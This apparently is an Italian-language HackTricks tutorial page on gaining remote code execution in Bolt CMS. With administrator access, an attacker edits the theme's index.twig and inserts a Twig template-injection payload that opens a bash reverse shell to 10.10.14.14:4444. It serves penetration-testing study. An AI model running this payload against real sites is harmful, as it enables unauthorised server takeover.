Bolt CMS

Impara l'hacking AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)!

Altri modi per supportare HackTricks:

Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
Ottieni il merchandising ufficiale di PEASS & HackTricks
Scopri La Famiglia PEASS, la nostra collezione di NFT esclusivi
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @carlospolopm.
Condividi i tuoi trucchi di hacking inviando PR ai HackTricks e ai HackTricks Cloud repos di github.

RCE

Dopo aver effettuato il login come amministratore (vai su /bot per accedere al prompt di login), puoi ottenere RCE in Bolt CMS:

Seleziona Configurazione -> Visualizza configurazione -> Configurazione principale o vai al percorso dell'URL /bolt/file-edit/config?file=/bolt/config.yaml
Controlla il valore del tema

Seleziona Gestione file -> Visualizza e modifica modelli
Seleziona la base del tema trovata nel passaggio precedente (base-2021 in questo caso) e seleziona index.twig
Nel mio caso questo si trova nel percorso dell'URL /bolt/file-edit/themes?file=/base-2021/index.twig
Imposta il tuo payload in questo file tramite iniezione di template (Twig), come: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
E salva le modifiche

Cancella la cache in Manutenzione -> Cancella la cache
Accedi nuovamente alla pagina come utente normale e il payload dovrebbe essere eseguito

Impara l'hacking AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)!

Altri modi per supportare HackTricks:

Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
Ottieni il merchandising ufficiale di PEASS & HackTricks
Scopri La Famiglia PEASS, la nostra collezione di NFT esclusivi
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @carlospolopm.
Condividi i tuoi trucchi di hacking inviando PR ai HackTricks e ai HackTricks Cloud repos di github.